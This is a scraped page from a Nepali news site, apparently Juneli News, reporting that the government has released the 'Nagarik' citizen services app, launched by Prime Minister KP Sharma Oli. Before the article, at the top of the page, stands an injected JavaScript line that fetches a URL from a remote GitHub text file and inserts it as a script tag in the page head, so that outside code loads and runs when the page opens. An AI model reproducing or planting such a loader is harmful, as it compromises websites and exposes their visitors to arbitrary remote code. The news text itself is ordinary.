;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); सरकारले सार्वजनिक गर्यो नागरिक एप – जुनेली न्युज
बिहिबार, बैशाख ५, २०८२
  • होमपेज
  • सरकारले सार्वजनिक गर्यो नागरिक एप
जुनेली बिशेष

सरकारले सार्वजनिक गर्यो नागरिक एप

माघ ०२,

काठमाडौं । सरकारकले नागरिक एप सार्वजनिक गरेको छ ।

शुक्रबार राष्ट्रिय गौरवको आयोजना अन्तर्गत रहेको नागरिक एव प्रधानमन्त्री केपी शर्मा ओलीले परिक्षणको रुपमा सार्वजनिक गरेका हुन् ।

यसबाट कम खर्चिलो, सजिलो, छिटोछरितो तरिकाले गर्ने गरि एप लाएको बताइएको छ । यसले नागरिलाई सहज रुपमा सेवा ल्याएको सरकारका प्रवाक्ता एवं सचारमन्त्री प्रार्वत गुरुङ्ले जानकारी दिए ।

उनले एप पत्रकार सम्मेलन गरि सार्वजनिक गरेको घोषणा गरे । नागरिक एपबाट सरकारी सेवा सुबिधा उपलब्ध गर्ने बताइएको छ ।

फेसबुक प्रतिक्रियाहरु